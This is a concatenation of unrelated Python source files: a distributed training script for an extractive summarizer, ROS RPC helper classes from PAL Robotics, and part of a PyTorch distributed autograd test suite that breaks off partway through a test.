for thread in threads:
thread.join()
print("THE END")
|
train_extractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer
from models.trainer_ext import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def train_multi_ext(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single_ext(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_ext(args, device_id):
print(device_id)
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_ext(args, device_id, cp, step)
else:
while (True):
            cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))  # poll for new checkpoints, mirroring the test_all branch
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
validate(args, device_id, cp, 1000)
test_ext(args, device_id, cp, 1000)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_ext(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter, step)
def train_ext(args, device_id):
if (args.world_size > 1):
train_multi_ext(args)
else:
train_single_ext(args, device_id)
def train_single_ext(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = ExtSummarizer(args, device, checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
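# A minimal sketch of driving these entry points directly, assuming an
# argparse-style namespace carrying the attributes read above; the attribute
# names come from this module, but the values are illustrative assumptions,
# not the project's defaults.
#
#   from argparse import Namespace
#   example_args = Namespace(
#       world_size=1, gpu_ranks=[0], visible_gpus='0', log_file='train.log',
#       seed=666, train_from='', batch_size=3000, train_steps=50000,
#       model_path='models/', test_all=False, test_from='', test_batch_size=200)
#   train_ext(example_args, device_id=0)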
|
pal_rpc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pal_python: pal_rpc.py
#
# Copyright (c) 2014 PAL Robotics SL. All Rights Reserved
#
# Permission to use, copy, modify, and/or distribute this software for
# any purpose with or without fee is hereby granted, provided that the
# above copyright notice and this permission notice appear in all
# copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Authors:
# * Paul Mathieu
import threading
import rospy
import actionlib
class EasyActionServer:
"""
Supposedly easier to use than the SimpleActionServer.
This action server will replace ROS services. It provides a
    simplistic asynchronous RPC call interface with a single goal.
    The cancel callback can be optionally specified to allow for interruptible
actions.
Intended use:
def ac_cb(goal):
print("received a goal: {}".format(goal))
EasyActionServer("/foo_action", foo.msg.FooAction, ac_cb)
"""
def __init__(self, ac_name, ac_type, cb, immediate_success=True):
""" If immediate_success is False, the user will have to call reply()
to set_succeeded() the goal. Otherwise, the goal will be automatically
        set to succeeded after the callback returns. """
self._cb = cb
self._opt_cancel_cb = None
self._ghdl = None
self._immed = immediate_success
self._ac = actionlib.ActionServer(ac_name, ac_type, auto_start=False,
goal_cb=self._goal_cb,
cancel_cb=self._cancel_cb)
self._ac.start()
def reply(self, result=None):
""" Only useful if `immediate_success=False` was given to the
constructor. Will mark the action as succeeded. """
if self._immed:
rospy.logwarn("EasyActionServer.reply() has no "
"effect if initialized with immediate_success=True")
return
if self._ghdl is not None: # goal has not been canceled or pre-empted
self._succeed(result)
def set_cancel_cb(self, cancel_cb):
""" Only useful if `immediate_success=False` was given to the
constructor (otherwise the action will immediately succeed). Will
register an optional cancel callback. """
if self._immed:
rospy.logwarn("EasyActionServer.set_cancel_cb() has no "
"effect if initialized with immediate_success=True")
return
self._opt_cancel_cb = cancel_cb
def _succeed(self, result=None):
if self._ghdl is None:
rospy.logerr("trying to succeed on an invalid goal handle")
return
self._ghdl.set_succeeded(result)
self._ghdl = None
def _goal_cb(self, ghdl):
if self._ghdl is not None:
self._ghdl.set_aborted()
self._ghdl = ghdl
self._ghdl.set_accepted()
self._cb(ghdl.get_goal())
if self._immed:
self._succeed()
def _cancel_cb(self, ghdl):
if ghdl != self._ghdl:
rospy.logerr("trying to cancel an invalid goal handle")
return
self._cancel()
if self._opt_cancel_cb is not None:
self._opt_cancel_cb()
def _cancel(self):
if self._ghdl is None:
rospy.logerr("trying to cancel an invalid goal handle")
return
self._ghdl.set_canceled()
self._ghdl = None
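# A minimal sketch of the deferred-reply pattern described in the docstrings
# above, reusing the hypothetical foo.msg.FooAction placeholder: construct the
# server with immediate_success=False, do the work in the goal callback, and
# call reply() once the result is ready.
#
#   def ac_cb(goal):
#       result = foo.msg.FooResult(answer=do_work(goal))  # do_work is hypothetical
#       server.reply(result)
#
#   server = EasyActionServer("/foo_action", foo.msg.FooAction, ac_cb,
#                             immediate_success=False)
#   server.set_cancel_cb(lambda: rospy.loginfo("goal canceled"))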
class AsyncServiceClient:
"""
Simple non-blocking service client.
Intended use:
srv_cl = AsyncServiceClient("/foo", foo.srv.Foo)
req = foo.srv.FooRequest()
req.bar = "baz"
srv_cl.call(req)
If you want to use the result:
def callback(result):
rospy.loginfo(result)
srv_cl.call(req, cb=callback)
Note that the callback (if not None) will be called from within a worker
thread. If the service is not available, or there is some error, the callback
won't be called.
"""
def __init__(self, srv_name, srv_type, persistent=False):
self._online = False
self._srv_name = srv_name
self._srv_type = srv_type
self._request = None
self._wakeup = threading.Condition()
threading.Thread(target=self._register_proxy,
args=[persistent]).start()
threading.Thread(target=self._worker).start()
def call(self, *args, **kwargs):
""" Asynchronously send a request to the service provider.
Usage:
call(*args, cb=None)
Returns False if the service is not available. Otherwise, if `cb'
is not None and there is no error, it'll be called with the result.
"""
        if kwargs and set(kwargs.keys()) != {'cb'}:  # use a set so the check also works on Python 3 dict views
raise ValueError('The only valid keyword argument is "cb".')
cb = kwargs.get('cb', None)
if self._online:
with self._wakeup:
self._request = (args, cb)
self._wakeup.notify_all()
return True
return False
def _register_proxy(self, persistent):
try:
rospy.wait_for_service(self._srv_name)
self._srvc = rospy.ServiceProxy(self._srv_name, self._srv_type,
persistent)
self._online = True
except rospy.ServiceException as e:
rospy.logerr("registering service {} failed: {}"
.format(self._srv_name, e))
except rospy.ROSInterruptException:
pass
def _worker(self):
while not rospy.is_shutdown():
if self._request is None:
with self._wakeup:
self._wakeup.wait(1.0)
continue
req, cb = self._request
            self._request = None  # TODO: drop the request if newer ones are in the queue
            try:
                result = self._call_service(*req)
if cb:
cb(result)
except rospy.ROSInterruptException:
break
def _call_service(self, *args):
try:
return self._srvc(*args)
except rospy.ServiceException as e:
rospy.logerr("service call to {} failed: {}"
.format(self._srv_name, e))
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import torch
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.testing._internal.common_utils import IS_MACOS
import torch.testing._internal.dist_utils as dist_utils
from torch.testing._internal.dist_utils import (
dist_init,
get_shutdown_error_regex,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] record, respectively, that the previous rank has
# finished its rpc and the context id sent from that rank.
# rpc_done[2] and ctx_ids[2] do the same for the rank two hops back.
# rpc_done[3] and ctx_ids[3] do the same for the rank three hops back.
# rpc_done[0] and ctx_ids[0] refer to the current rank and are mostly unused.
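# Worked example of this indexing (assuming world_size == 4): when rank 1 calls
# _set_rpc_done on dst_rank = (1 + 1) % 4 == 2 with rank_distance == 1, rank 2
# marks rpc_done[1] = True and stores rank 1's context id in ctx_ids[1], i.e. the
# entry for the rank one hop behind it.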
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# the rref tensor equals the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor():
# type: () -> Tensor
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1, t2):
# type: (RRef[Tensor], Tensor) -> Tensor
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# After a dist autograd context is cleaned up locally, it should also be cleaned
# up on the other nodes. This helper allows timeout_seconds for those cleanup
# RPCs to complete, and checks that all known contexts are gone within that timeframe.
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dist autograd context, runs rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except that the rpc calls the
# torchscript function "my_script_ref_add" instead of the python function "my_rref_add".
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
@unittest.skipIf(
not torch._six.PY3, "Pytorch distributed autograd package does not support python2"
)
class DistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
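        # Worked example of the layout this check assumes: a context id is a
        # 64-bit value whose top 16 bits hold the worker id and whose low 48
        # bits hold an auto-incremented counter, so
        #   context_id = (worker_id << 48) | counter,  counter <= 2**48 - 1 == 281474976710655.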
context_ids = []
for i in range(1000):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
    # For the current context, this rank sends the t1 and t2 tensors to dst_rank,
    # then gets back the result tensor t3 = torch.add(t1, t2).
    # For the current context in this rank, it expects a graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
    # For a context passed from previous nested chain calls, this rank
    # receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
    # the result tensor t3 back.
    # For this context in this rank, it expects a graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
    # For a context passed from previous nested chain calls, this rank
    # receives two tensors t1 and t2 and forwards them via a nested rpc call
    # to the next dst. On the return route, it receives the result tensor t3
    # from the next dst and forwards t3 back to the previous caller.
    # For this context in this rank, it expects a graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
        # For the send function created when making the nested rpc call, the
        # next functions of the send function are the two recv functions for
        # the two tensors received from the previous call.
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
        # For the send function created when returning the response to the
        # previous call, the next function of the send function is the recv
        # function for the result tensor returned from the nested call.
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
            # For self.rank, there are 4 graphs to verify:
            # one for the current context id, when this rank sends the first rpc call;
            # one for the prev context id, when this rank makes the 1st nested call;
            # one for the prev prev context id, when this rank makes the 2nd nested call;
            # and one for the prev prev prev context id, when this rank executes
            # the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
            # For self.rank, there are 2 graphs to verify.
            # One is for the current context id, when this rank sends the first
            # rpc call and executes the torch.add() operator.
            # The other is for the prev context id, when this rank makes the
            # nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.init_method, self.rank, self.world_size)
